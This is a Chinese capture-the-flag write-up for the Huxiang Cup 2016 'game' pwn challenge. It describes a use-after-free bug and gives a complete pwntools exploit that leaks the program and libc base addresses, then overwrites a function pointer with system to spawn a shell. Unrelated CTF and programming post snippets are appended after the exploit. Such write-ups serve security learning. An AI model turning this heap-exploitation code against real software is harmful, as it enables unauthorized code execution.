0x00 分析程序

根据分析,我们可以得到以下重要数据结构

0x01 发现漏洞

1.在武器使用次数耗光后,程序会把存储该武器的堆块free,在free的时候没有清空指针,造成悬挂指针

2.comment存储在一个大小和武器块一样的堆块中,我们武器释放后再执行commit函数,那么武器堆块和comment堆块是同一块堆块

0x02 漏洞利用

1.在comment函数中向堆块中写入16字节的ascii码,再利用show_weapon函数把武器数据结构中的attack函数地址泄露出来,由此可以计算得到程序基址

2.利用程序基址计算出printf地址,再将printf函数写到attack函数处,再调用attack函数(相当于调用printf函数)把memset函数地址打印出来,由此可以计算出libc基址

3.得到了libc基址,就可以根据libc.so库算出system_addr,再利用comment将system函数写到attack函数处,在堆块中写入‘/bin/sh’,调用attack函数便可得到shell.

0x03 exp

from pwn import *

t = process('./game')
libc = ELF('./libc.so')
context.log_level = "debug" def warehouse(count):
t.recvuntil('$')
t.sendline('build_warehouse')
t.recvuntil('want have?\n')
t.sendline(str(count)) def buy(name, tid):
t.recvuntil('$')
t.sendline('buy_weapon')
t.recvuntil('buy?\n')
t.sendline(name)
t.recvuntil('weapon?\n')
t.sendline(str(tid)) def show(tid):
t.recvuntil('$')
t.sendline('show_weapon')
t.recvuntil('warehouse\n')
t.sendline(str(tid)) def attack(tid):
t.recvuntil('$')
t.sendline('attack_boss')
t.recvuntil('warehouse\n')
t.sendline(str(tid)) def comment(co_buff):
t.recvuntil('$')
t.sendline('comment')
t.recvuntil('?\n')
t.send(co_buff) def leak_addr(addr,printf_plt):
co_buff = ''
co_buff += '%%%d$s.' % (7)
co_buff = co_buff.ljust(16, '\x00')
co_buff += p32(printf_plt)
co_buff += '\n'
comment(co_buff)
show(0)
t.sendline('attack_boss') t.recvuntil('warehouse\n')
payload = ''
payload += ''* 0x04
payload += p32(addr)
t.sendline(payload)
data = t.recv(4)
back_addr = u32(data[:4])
return back_addr def main():
t.recvuntil('name?\n')
t.sendline('xt')
warehouse(3)
buy('UMP45', 0)
attack(0)
attack(0)
attack(0)
show(0) co_buff = ''
co_buff += 'd' * 0x16 + '\n'
comment(co_buff)
show(0)
t.recvuntil('Weapon name: ')
t.recv(16)
data = t.recvuntil('price:')[:-7] addr = u32(data[:4].ljust(4, '\x00'))
proc_addr = addr - 0x1287
success('proc_addr:' + hex(proc_addr)) memset_got = 0x00002154 + proc_addr
printf_plt = 0x00000710 + proc_addr
memset_addr = leak_addr(memset_got,printf_plt) offset_memset = libc.symbols['memset']
offset_system = libc.symbols['system'] libc_base = memset_addr - offset_memset
system_addr = libc_base + offset_system
success('libc_base:' + hex(libc_base))
success('system_addr:' + hex(system_addr)) co_buff = ""
co_buff += "/bin/sh;"
co_buff = co_buff.ljust(16, '\x00')
co_buff += p32(system_addr)
co_buff += "\n"
comment(co_buff)
t.sendline("attack_boss")
t.recvuntil("warehouse\n")
payload = ""
payload += ""
t.sendline(payload) t.interactive() if __name__ == '__main__':
main()

uaf-湖湘杯2016game_学习的更多相关文章

  1. CTF 湖湘杯 2018 WriteUp (部分)

    湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处! 1.  CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错.点击登录框下面的滚动通知,URL ...

  2. 2017湖湘杯复赛writeup

    2017湖湘杯复赛writeup 队伍名:China H.L.B 队伍同时在打 X-NUCA  和 湖湘杯的比赛,再加上周末周末周末啊,陪女朋友逛街吃饭看电影啊.所以精力有点分散,做出来部分题目,现在 ...

  3. 2019 湖湘杯 Reverse WP

    0x01 arguement 下载链接:https://www.lanzous.com/i7atyhc 1.准备 获取到信息: 32位的文件 upx加密文件 在控制台打开文件 使用"upx ...

  4. 【CTF】2019湖湘杯 miscmisc writeup

    题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...

  5. 2017湖湘杯Writeup

    RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行upx -d 文件名即可. Step3:IDA打开,shift+F12看字符串. 点进 ...

  6. Bugku Writeup —文件上传2(湖湘杯)

    我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到f ...

  7. 2018湖湘杯web、misc记录

    1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...

  8. 湖湘杯2020_ReMe

    查壳后发现是由Python2.7环境下编译得到的exe可执行文件 由此想到可将exe转为pyc文件再反编译成py文件 且该方法只适用于py2 无混淆 因为py3的字节码结构有些许变化 step1: 在 ...

  9. 湖湘杯2020 writeup

    这个平台中间卡的离谱,卡完过后交了flag分还掉了 Web 题目名字不重要 也算是非预期吧,赛后y1ng师傅也说了因为要多端口环境必须这样配,预期解很难 NewWebsite 后台弱口令admin a ...

随机推荐

  1. 洛谷 P1712 [NOI2016]区间(线段树)

    传送门 考虑将所有的区间按长度排序 考虑怎么判断点被多少区间覆盖,这个可以离散化之后用一棵权值线段树来搞 然后维护两个指针$l,r$,当被覆盖次数最多的点的覆盖次数小于$m$时不断右移$r$,在覆盖次 ...

  2. .netcore--Controller后台实现企业微信发送消息

    一.获得企业微信管理端权限,登录企业企业微信管理端界面,并创建应用,如下图中的[网站消息推送] 二.参见企业微信API文献,根据corpid=ID&corpsecret=SECRET(其中企业 ...

  3. 慕课笔记-Java入门第三季

    1.自定义异常 自定义异常必须继承Exception类或者其子类. 2.字符串 String对象创建后则不能被修改,是不可变的,所谓的修改其实是创建了新的对象. 多次创建的字符常量,Java编译程序只 ...

  4. html table导出到Excel中,不走后台,js完成

    静态表格table <table class="table tableStyles" id="tables"> <caption>不正经 ...

  5. Mybatis分页中遇到的坑2

    站在巨人的肩膀上    http://crocutax.com/blog/mybatis-one-to-many-nestes-query-and-page-query Mybatis一对多嵌套查询和 ...

  6. android 多线程下载思路

    首先请求下载url,获取文件大小和文件类型 比如获取到文件大小是7410642  文件类型为application/vnd.android.package-archive(即后缀为apk,安卓app安 ...

  7. java简单操作redis数据库

    package RedisTest; import redis.clients.jedis.Jedis; public class RedisTest { private static String ...

  8. [题解](背包)luogu_P4095 eden的新背包问题

    有一点乱搞吧......对人对背包的理解有些考验,要想知道去掉某个点的值,可以选择对前缀求一次背包,后缀求一次背包,而且不省掉价钱那一维, 这样每个点就可以由前后组合成了,枚举一下价钱取max即可 直 ...

  9. Metasploits之Adobe阅读器漏洞

    实验环境:Kali 2.0+Windows XP+Adobe Reader 9.3.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uni ...

  10. ssrs 里 表头 分页后显示

    1. 列组,箭头,高级 2.点击行组,静态 3. 设置静态行组 属性